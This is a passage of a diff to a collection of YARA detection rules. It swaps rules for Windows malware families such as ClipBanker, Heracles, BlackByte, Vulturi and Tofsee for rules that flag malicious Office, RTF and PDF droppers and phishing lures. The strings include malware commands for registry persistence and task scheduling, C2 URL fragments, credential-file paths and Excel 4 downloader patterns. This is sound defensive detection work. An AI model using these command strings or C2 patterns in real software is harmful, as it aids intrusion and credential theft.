-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 2 of them ) or ( all of ( $kdc* ) and ( 1 of ( $x* ) or all of ( $r* ) or 2 of ( $s* ) ) ) or ( 8 of them ) or ( pe.exports ( "MainFun" ) and pe.exports ( "NetApiBufferFree" ) and pe.exports ( "BeaEngineRevision" ) and pe.exports ( "BeaEngineVersion" ) and pe.exports ( "Disasm" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DsGetDcName" ) and 2 of them ) )
+		$olerel and $mode and 1 of ( $target* )
 }
-rule DITEKSHEN_MALWARE_Win_Chinotto : FILE
+rule DITEKSHEN_INDICATOR_RTF_Malver_Objects : FILE
 {
 	meta:
-		description = "Detects Chinotto"
+		description = "Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents."
 		author = "ditekSHen"
-		id = "e66703d4-c9c6-5bb4-9e07-11dc89b0a034"
+		id = "2d9d80e0-473e-5aac-a576-8f0002e120e2"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8702-L8754"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L704-L718"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "92f37bdc4cf17e07bb556c60e3bde4547c34f67a2fb5c806000d9cb2446adff1"
+		logic_hash = "69136fb8ba180f6f86e569471bcefe8f55c61af73c66ebd6062ba7369aee9a72"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "xxxchinotto" ascii wide
-		$x2 = "\\Chinotto.pdb" ascii wide
-		$x3 = { 50 4f 53 54 20 25 73 20 48 54 54 50 2f 31 2e 31
-                0d 0a 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e
-                67 3a 20 67 7a 69 70 2c 20 64 65 66 6c 61 74 65
-                0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f
-                7a 69 6c 6c 61 2f 34 2e 30 28 63 6f 6d 70 61 74
-                69 62 6c 65 3b 20 4d 53 49 45 20 36 2e 30 3b 20
-                57 69 6e 64 6f 77 73 20 4e 54 20 35 2e 31 3b 20
-                53 56 31 29 0d 0a 41 63 63 65 70 74 3a 20 69 6d
-                61 67 65 2f 67 69 66 2c 20 69 6d 61 67 65 2f 78
-                2d 78 62 69 74 6d 61 70 2c 20 69 6d 61 67 65 2f
-                6a 70 65 67 2c 20 69 6d 61 67 65 2f 70 6a 70 65
-                67 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78
-                2d 73 68 6f 63 6b 77 61 76 65 2d 66 6c 61 73 68
-                2c 20 2a 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67
-                75 61 67 65 3a 20 65 6e 2d 75 73 0d 0a 43 6f 6e
-                74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69
-                70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 62
-                6f 75 6e 64 61 72 79 3d 25 73 0d 0a 48 6f 73 74
-                3a 20 25 73 3a 25 64 0d 0a 43 6f 6e 74 65 6e 74
-                2d 4c 65 6e 67 74 68 3a 20 25 64 0d 0a 43 6f 6e
-                6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c
-                69 76 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72
-                6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a
-                00 00 00 00 48 54 54 50 2f 31 2e 31 20 32 30 30
-                20 4f 4b 00 0d 0a 0d 0a 00 00 00 00 65 72 72 6f
-                72 3c 2f 62 3e }
-		$s1 = "Run /v xxxzexs /t REG_SZ /d %s /f" ascii wide
-		$s2 = "ShellExecute Error, ret" ascii wide
-		$s3 = "Run app succeed" ascii
-		$s4 = "cleartemp:" fullword ascii
-		$s5 = "wakeup:" fullword ascii
-		$s6 = "updir:" fullword ascii
-		$s7 = "regstart:" fullword ascii
-		$s8 = "chdec:" fullword ascii
-		$s9 = "cmd:" fullword ascii
-		$s10 = "error</b>" fullword ascii
-		$c1 = "Host: %s:%d" ascii wide
-		$c2 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1; SV1)" ascii wide
-		$c3 = "Mozilla/5.0(Windows NT 10.0; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/78.0.3904.108 Safari/537.36" ascii wide
-		$c4 = "id=%s&type=hello&direction=send" ascii wide
-		$c5 = "id=%s&type=command&direction=receive" ascii wide
-		$c6 = "id=%s&type=file&direction=" ascii wide
-		$c7 = "id=%s&type=result&direction=" ascii wide
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or ( 1 of ( $x* ) and ( 2 of ( $s* ) or 2 of ( $c* ) ) ) or 4 of ( $c* ) or 5 of ( $s* ) )
+		uint32( 0 ) == 0x74725c7b and ( ( not uint8( 4 ) == 0x66 or not uint8( 5 ) == 0x31 or not uint8( 6 ) == 0x5c ) and 1 of ( $obj* ) )
 }
-
-rule DITEKSHEN_MALWARE_Win_Tardigrade : FILE
+rule DITEKSHEN_INDICATOR_PPT_Mastermana : FILE
 {
 	meta:
-		description = "Detects Tardigrade"
+		description = "Detects known malicious pattern (MasterMana) in PowerPoint documents."
 		author = "ditekSHen"
-		id = "a46caaaa-2954-552a-a20f-952c47370393"
+		id = "8e9b8185-6211-54c6-946d-b16f2226312a"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8756-L8787"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L720-L740"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2bd4f23f66844a320b6bed6242ba39096f66a08affb84abd78c342d433ed9fe6"
+		logic_hash = "f8169e63b22fbbd48de9a63ff228d9d9fb105e95d2ea8a37c0993493515e8b2e"
 		score = 75
-		quality = 50
+		quality = 71
 		tags = "FILE"
-		hash1 = "c0976a1fbc3dd938f1d2996a888d0b3a516b432a2c38d788831553d81e2f5858"
-		hash2 = "966b2c7c72a28310acd58bb23af4d3c893b2afca264b2d9c0ec42db815c77487"
-		hash3 = "88be5da274df704dc7fd9882c661a0afdd35f1ce0a7145e30f51c292abd2a86b"
-		hash4 = "cf88926b7d5a5ebbd563d0241aaf83718b77cec56da66bdf234295cc5a91c5fe"
-		hash5 = "4afd9f0dde092daeac3f3e6ffb0aee06682b3dba6005d2bd1a914eefd5cc6a30"
 
 	strings:
-		$x1 = "cmd.exe /c echo kOJAdtQoDcMuogIZIl>\"%s\"&exit" fullword ascii
-		$x2 = "cmd.exe /c echo HBnBcZPeUevCDQmKGzXxYJHqpzRAbRCQCihOxiLi>\"%s\"&exit" fullword ascii
-		$x3 = "cmd.exe /c set kpUUCjoLWLZvJFc=3167 & reg add HKCU\\SOFTWARE\\EQwIobTRgsJ /v PDMXPmqSYnUx /t REG_DWORD /d 10080 & exit" fullword ascii
-		$s1 = "ReplaceFileA" ascii
-		$s2 = "FlushFileBuffers" ascii
-		$s3 = "WaitNamedPipeA" ascii
-		$s4 = "ImpersonateNamedPipeClient" ascii
-		$s5 = "RegFlushKey" ascii
-		$s6 = /cmd\.exe \/c (echo|set)/ ascii
-		$s7 = ">\"%s\"&exit" ascii
+		$a1 = "auto_close" ascii nocase
+		$a2 = "autoclose" ascii nocase
+		$a3 = "auto_open" ascii nocase
+		$a4 = "autoopen" ascii nocase
+		$vb1 = "\\VBE7.DLL" ascii
+		$vb2 = { 41 74 74 72 69 62 75 74 ?? 65 20 56 42 5f 4e 61 6d ?? 65 }
+		$clsid = "000204EF-0000-0000-C000-000000000046" wide nocase
+		$i1 = "@j.mp/" ascii wide
+		$i2 = "j.mp/" ascii wide
+		$i3 = "\\pm.j\\\\:" ascii wide
+		$i4 = ".zz.ht/" ascii wide
+		$i5 = "/pm.j@" ascii wide
+		$i6 = "\\pm.j@" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and ( 1 of ( $x* ) or 6 of ( $s* ) ) and ( pe.exports ( "DllGetClassObject" ) and pe.exports ( "DllMain" ) and pe.exports ( "DllRegisterServer" ) and pe.exports ( "DllUnregisterServer" ) and pe.exports ( "InitHelperDll" ) and pe.exports ( "StartW" ) )
+		uint16( 0 ) == 0xcfd0 and 1 of ( $i* ) and $clsid and 1 of ( $a* ) and 1 of ( $vb* )
 }
-rule DITEKSHEN_MALWARE_Win_Clipbanker02 : FILE
+rule DITEKSHEN_INDICATOR_XML_Webrelframe_Remotetemplate : FILE
 {
 	meta:
-		description = "Detects ClipBanker infostealer"
+		description = "Detects XML web frame relations refrencing an external target in dropper OOXML documents"
 		author = "ditekSHen"
-		id = "c2a480cf-e81b-53a2-999a-80209050e0cf"
+		id = "724650db-8d58-5e73-92e7-287890babc3b"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8789-L8814"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L742-L752"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "51a43245b1e0b6fea874302b73bf552012c54c3f7c12b8c447c96c2ffdcc1dcb"
+		logic_hash = "fbe209e31ddb4369de02b6e91bf65f0588089c7b838dcf80f182248790b59e20"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "\\Allcome\\Source code\\Clipper\\" ascii nocase
-		$x2 = "\\cleaper\\Release\\cleaper.pdb" ascii nocase
-		$v1_1 = "&username=" fullword ascii
-		$v1_2 = "/card.php?data=" fullword ascii
-		$v1_3 = "/Create /tn MicrosoftDriver /sc MINUTE /tr" fullword ascii
-		$v1_4 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0" fullword ascii
-		$v1_5 = "/API/Clipper/ykesqk0o.php?cf6zrlhn=" fullword ascii
-		$v1_6 = "&di7ztth6=" fullword ascii
-		$v1_7 = "/API/Clipper/hr627gzk.php?v6etwxo5=" fullword ascii
-		$v2_1 = "bitcoincash:" fullword ascii
-		$v2_2 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" ascii
-		$re1 = "^[0-9]{16}$" fullword ascii
-		$re2 = "^[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}\\s[0-9]{4}" fullword ascii
-		$re3 = "^\\d{2}\\D\\d{2}" fullword ascii
-		$re4 = "^[0-9]{3}" fullword ascii
-		$re5 = "([\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?[0-9]{4}[\\W]?)" fullword ascii
-		$re6 = "(\\d{2}\\D\\d{2})" fullword ascii
-		$re7 = "(\\d{3})" fullword ascii
+		$target1 = "/frame\" Target=\"http" ascii nocase
+		$target2 = "/frame\" Target=\"file" ascii nocase
+		$mode = "TargetMode=\"External" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and ( 5 of ( $v1* ) or all of ( $v2* ) ) ) or ( 3 of ( $re* ) and ( 2 of ( $v1* ) or 2 of ( $v2* ) ) ) )
+		uint32( 0 ) == 0x6d783f3c and ( 1 of ( $target* ) and $mode )
 }
-rule DITEKSHEN_MALWARE_Win_Badjoke : FILE
+rule DITEKSHEN_INDICATOR_PDF_Ipdropper : FILE
 {
 	meta:
-		description = "Detects BadJoke / Witch"
+		description = "Detects PDF documents with Action and URL pointing to direct IP address"
 		author = "ditekSHen"
-		id = "082727d5-618f-542d-93ca-ba93be16cd80"
+		id = "83368671-f1ec-5b09-9d55-6e45e576ebdb"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8816-L8831"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L754-L763"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4699a772bcd50d2fe43740df59a4c56598ba43ebcc18acbf8ec401b6f5a01fe6"
-		score = 75
-		quality = 75
+		logic_hash = "be37ee7ef5d8c980483f31bf5667c2dad4321d662be05c495ec6755362d33fd6"
+		score = 60
+		quality = 35
 		tags = "FILE"
 
 	strings:
-		$s1 = "msdownld.tmp" fullword ascii
-		$s2 = "UPDFILE%lu" fullword ascii
-		$s3 = "Command.com /c %s" fullword ascii
-		$s4 = "launch.cmd" fullword ascii
-		$s5 = "virus.vbs" fullword ascii
-		$s6 = "virus.py" fullword ascii
-		$m1 = "Message from Google Virus" ascii
-		$m2 = "you cannot get rid of this virus" ascii
+		$s1 = { 54 79 70 65 20 2f 41 63 74 69 6f 6e 0d 0a 2f 53 20 2f 55 52 49 0d 0a }
+		$s2 = /\/URI \(http(s)?:\/\/([0-9]{1,3}\.){3}[0-9]{1,3}\// ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $m* ) or all of ( $s* ) or ( 1 of ( $m* ) and 2 of ( $s* ) ) )
+		uint32( 0 ) == 0x46445025 and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Heracles : FILE
+rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL1 : FILE
 {
 	meta:
-		description = "Detects Heracles infostealer"
+		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
 		author = "ditekSHen"
-		id = "36cb9366-c70b-5117-955f-402f87f3a88c"
+		id = "4212d762-ea49-5884-b697-9313f43140d5"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8833-L8861"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L765-L789"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1d5c80c084f9d6e4692a18f74574179095ecdd5eaadd70b5d16c19702761d74f"
+		logic_hash = "a3248027b83b982cccf235267aa27def4f640987d41c5f11509bde3e27b82fee"
 		score = 75
-		quality = 73
+		quality = 25
 		tags = "FILE"
 
 	strings:
-		$x1 = "aHR0cHM6Ly9uYWNrZXIudG9hbnNlY3UuY29tL3VwbG9hZHM/a2V5PX" wide
-		$b1 = "XEdvb2dsZVxDaHJvbWVc" wide
-		$b2 = "XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3Nlcl" wide
-		$b3 = "XENvY0NvY1xCcm93c2VyX" wide
-		$b4 = "VXNlciBEYXRh" wide
-		$b5 = "RGVmYXVsdA" wide
-		$b6 = "UHJvZmlsZQ" wide
-		$b7 = "Q29va2llcw" wide
-		$b8 = "TG9naW4gRGF0YQ" wide
-		$b9 = "TG9jYWwgU3RhdGU" wide
-		$b10 = "bG9jYWxzdGF0ZQ" wide
-		$b11 = "bG9naW5kYXRh" wide
-		$s1 = "encrypted_key" fullword wide
-		$s2 = "<GetIpInfoAsync>d__" ascii
-		$s3 = "<reqHTML>5__" ascii
-		$s4 = "<idHardware>5__" ascii
-		$s5 = "<profilePaths>5__" ascii
-		$s6 = "<cookieFile>5__" ascii
-		$s7 = "<loginDataFile>5__" ascii
-		$s8 = "<localStateFile>5__" ascii
-		$s9 = "<postData>5__" ascii
+		$s1 = "Macros Excel 4.0" fullword ascii
+		$s2 = { 00 4d 61 63 72 6f 31 85 00 }
+		$s3 = "http" ascii
+		$s4 = "file:" ascii
+		$fa_exe = ".exe" ascii nocase
+		$fa_scr = ".scr" ascii nocase
+		$fa_dll = ".dll" ascii nocase
+		$fa_bat = ".bat" ascii nocase
+		$fa_cmd = ".cmd" ascii nocase
+		$fa_sct = ".sct" ascii nocase
+		$fa_txt = ".txt" ascii nocase
+		$fa_psw = ".ps1" ascii nocase
+		$fa_py = ".py" ascii nocase
+		$fa_js = ".js" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or 8 of ( $s* ) or ( 4 of ( $b* ) and 4 of ( $s* ) ) )
+		uint16( 0 ) == 0xcfd0 and ( 3 of ( $s* ) and 1 of ( $fa* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Onlylogger : FILE
+rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL2 : FILE
 {
 	meta:
-		description = "Detects OnlyLogger loader variants"
+		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
 		author = "ditekSHen"
-		id = "525aa2a0-5090-5f96-999b-67ca4379f897"
+		id = "ea331976-6e5d-5377-a100-0f265e97177f"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8863-L8882"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L791-L812"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1b39a4d2a6d3a2633cfa98adc1dfe99d10d2493fd06c9f875c56ec7689b7a561"
-		score = 75
-		quality = 25
+		logic_hash = "48ab27a2f81934f6f2f034ebcd40fc083b0d90850d12a951f03dab3a4c396ec6"
+		score = 50
+		quality = 45
 		tags = "FILE"
 
 	strings:
-		$s1 = { 45 6c 65 76 61 74 65 64 00 00 00 00 4e 4f 54 20 65 6c 65 76 61 74 65 64 }
-		$s2 = "\" /f & erase \"" ascii
-		$s3 = "/c taskkill /im \"" ascii
-		$s4 = "KILLME" fullword ascii
-		$s5 = "C:\\Windows\\System32\\cmd.exe" fullword ascii
-		$gn = ".php?pub=" ascii
-		$ip = /\/1[a-z0-9A-Z]{4,5}/ fullword ascii
-		$h1 = "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1" fullword ascii
-		$h2 = "Accept-Language: ru-RU,ru;q=0.9,en;q=0.8" fullword ascii
-		$h3 = "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1" fullword ascii
-		$h4 = "Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0" fullword ascii
-		$h5 = "Content-Type: application/x-www-form-urlencoded" fullword wide
+		$e1 = "Macros Excel 4.0" ascii
+		$e2 = { 00 4d 61 63 72 6f 31 85 00 }
+		$a1 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
+		$a2 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
+		$a3 = { 18 00 21 00 20 00 00 01 12 00 00 00 00 00 00 00 00 00 01 3a ff }
+		$a4 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
+		$a5 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
+		$a6 = "auto_open" ascii nocase
+		$a7 = "auto_close" ascii nocase
+		$x1 = "* #,##0" ascii
+		$x2 = "=EXEC(CHAR(" ascii
+		$x3 = "-w 1 stARt`-s" ascii nocase
+		$x4 = ")&CHAR(" ascii
+		$x5 = "Reverse" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) or ( #ip > 5 and ( $gn or 3 of ( $s* ) or all of ( $h* ) ) ) or ( all of ( $h* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0xcfd0 and ( 1 of ( $e* ) and 1 of ( $a* ) and ( #x1 > 3 or 2 of ( $x* ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Blackbytego : FILE
+rule DITEKSHEN_INDICATOR_RTF_Embedded_Excel_Urldownloadtofile : FILE
 {
 	meta:
-		description = "Detects BlackByte ransomware Go variants"
+		description = "Detects RTF documents that embed Excel documents for detection evation."
 		author = "ditekSHen"
-		id = "25431446-8cce-54cc-925d-5d9147344c6d"
+		id = "39b8723c-1755-5e2f-8fb2-cca5e9eef915"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8884-L8904"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L814-L840"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b3e6a4a2f043293e8693cfbe1515681ce0616d98e2492732fc06a01a96309883"
+		logic_hash = "9416664683c249a9dc2b3d506d9dea7067a638cc4ee5ef7138e5b33a8fcd2b96"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "BlackByteGO/_cgo_gotypes.go" fullword ascii
-		$x3 = "BlackByteGO/" ascii nocase
-		$s1 = ".Disconnect" ascii
-		$s2 = ".OpenService" ascii
-		$s3 = ".ListServices" ascii
-		$s4 = ".Start" ascii
-		$s5 = ".Encrypt" ascii
-		$s6 = ".Decrypt" ascii
-		$s7 = ".MustFindProc" ascii
-		$s8 = ".QuoRem" ascii
-		$s9 = "C:\\Windows\\regedit.exe" fullword wide
+		$clsid1 = "2008020000000000c000000000000046" ascii nocase
+		$obj1 = "\\objhtml" ascii
+		$obj2 = "\\objdata" ascii
+		$obj3 = "\\objupdate" ascii
+		$obj4 = "\\objemb" ascii
+		$obj5 = "\\objautlink" ascii
+		$obj6 = "\\objlink" ascii
+		$ole1 = { d0 cf 11 e0 a1 b1 1a e1 }
+		$ole2 = "d0cf11e0a1b11ae1" ascii nocase
+		$ole3 = "64306366313165306131623131616531" ascii
+		$ole4 = "640a300a630a660a310a310a650a300a610a310a620a310a310a610a650a31"
+		$ole5 = { 64 30 63 66 [0-2] 31 31 65 30 61 31 62 31 31 61 65 31 }
+		$ole6 = "D0cf11E" ascii nocase
+		$s1 = "55524c446f776e6c6f6164546f46696c6541" ascii nocase
+		$s2 = "55524c4d4f4e" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 1 of ( $x* ) or all of ( $s* ) )
+		uint32( 0 ) == 0x74725c7b and ( 1 of ( $clsid* ) and 1 of ( $obj* ) and 1 of ( $ole* ) and 1 of ( $s* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Vulturi : FILE
+rule DITEKSHEN_INDICATOR_OLE_Excel4Macros_DL3 : FILE
 {
 	meta:
-		description = "Detects Vulturi infostealer"
+		description = "Detects OLE Excel 4 Macros documents acting as downloaders"
 		author = "ditekSHen"
-		id = "dca814d6-ca26-5315-9f80-628ee50e8dfa"
+		id = "794cac49-e917-5282-8cbd-8ecf91a2dc9e"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8906-L8931"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L842-L860"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4d1d88764dd72ae78a74b802e11c2f28899b7b9f45c54cf3bf7aaac49dd48d7f"
+		logic_hash = "83eaf60b900119b9fcd458e9e9dda119fd71785821bf282e9385031368ff9891"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$x1 = "Vulturi_" ascii wide
-		$x2 = "VulturiProject" fullword ascii
-		$s1 = { 5b 00 2d 00 5d 00 20 00 53 00 65 00 72 00 76 00
-               65 00 72 00 20 00 ?? ?? 20 00 69 00 73 00 20 00
-               6f 00 66 00 66 00 6c 00 69 00 6e 00 65 00 2e 00
-               2e 00 2e 00 00 ?? 5b 00 2b 00 5d 00 20 00 53 00
-               65 00 72 00 76 00 65 00 72 00 20 00 00 ?? ?? 00
-               69 00 73 00 20 00 6f 00 6e 00 6c 00 69 00 6e 00
-               65 00 }
-		$s2 = "Writing is not alowed" wide
-		$s3 = "System\\ProcessList.txt" fullword wide
-		$s4 = "[X] GetSSL ::" fullword wide
-		$s5 = "Failed to steal " wide
-		$s6 = "StealerStub" fullword ascii
-		$s7 = "/C chcp 65001 && netsh" wide
-		$n1 = "fetch_options" fullword wide
-		$n2 = "send_report" fullword wide
-		$n3 = "?username=" fullword wide
+		$a1 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
+		$a2 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3a 00 }
+		$a3 = { 18 00 21 00 20 00 00 01 12 00 00 00 00 00 00 00 00 00 01 3a ff }
+		$a4 = { 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
+		$a5 = { 18 00 17 00 aa 03 00 01 07 00 00 00 00 00 00 00 00 00 00 02 3a 00 }
+		$a6 = "auto_open" ascii nocase
+		$a7 = "auto_close" ascii nocase
+		$s1 = "* #,##0" ascii
+		$s2 = "URLMon" ascii
+		$s3 = "DownloadToFileA" ascii
+		$s4 = "DllRegisterServer" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and any of them ) or all of ( $n* ) or 5 of ( $s* ) or ( 1 of ( $n* ) and 3 of ( $s* ) ) )
+		uint16( 0 ) == 0xcfd0 and 1 of ( $a* ) and all of ( $s* ) and #s1 > 3
 }
-rule DITEKSHEN_MALWARE_Win_Tofsee : FILE
+rule DITEKSHEN_INDICATOR_DOC_Phishingpatterns : FILE
 {
 	meta:
-		description = "Detects Tofsee"
+		description = "Detects OLE, RTF, PDF and OOXML (decompressed) documents with common phishing strings"
 		author = "ditekSHen"
-		id = "86371c0b-72f9-56c0-9f34-f14d2a069c91"
+		id = "67372eb5-ed07-5062-a12e-9ad8c7070f0f"
 		date = "2020-11-06"
-		modified = "2024-11-01"
+		modified = "2024-09-06"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L8933-L8949"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_office.yar#L862-L883"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9ef06643173c70c5b06b19200cb5b5efa7db7eb3516b67621f0b1975f1c80781"
+		logic_hash = "50b6566cb18512f887c07576391eb492101f7534da3460d5f7740ee6f4cf707d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$s1 = "n%systemroot%\\system32\\cmd.exe" fullword wide
-		$s2 = "loader_id" fullword ascii
-		$s3 = "start_srv" fullword ascii
-		$s4 = "lid_file_upd" fullword ascii
-		$s5 = "localcfg" fullword ascii
-		$s6 = "Incorrect respons" fullword ascii
-		$s7 = "mx connect error" fullword ascii
-		$s8 = "Error sending command (sent = %d/%d)" fullword ascii
-		$s9 = "%s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u" fullword ascii
+		$s1 = "PERFORM THE FOLLOWING STEPS TO PERFORM DECRYPTION" ascii nocase
+		$s2 = "Enable Editing" ascii nocase
+		$s3 = "Enable Content" ascii nocase
+		$s4 = "WHY I CANNOT OPEN THIS DOCUMENT?" ascii nocase
+		$s5 = "You are using iOS or Android, please use Desktop PC" ascii nocase
+		$s6 = "You are trying to view this document using Online Viewer" ascii nocase
+		$s7 = "This document was edited in a different version of" ascii nocase
+		$s8 = "document are locked and will not" ascii nocase
+		$s9 = "until the \"Enable\" button is pressed" ascii nocase
+		$s10 = "This document created in online version of Microsoft Office" ascii nocase
+		$s11 = "This document created in previous version of Microsoft Office" ascii nocase
+		$s12 = "This document protected by Microsoft Office" ascii nocase
+		$s13 = "This document encrypted by" ascii nocase
+		$s14 = "document created in earlier version of microsoft office" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		( uint16( 0 ) == 0xcfd0 or uint32( 0 ) == 0x74725c7b or uint32( 0 ) == 0x46445025 or uint32( 0 ) == 0x6d783f3c ) and 2 of them
 }
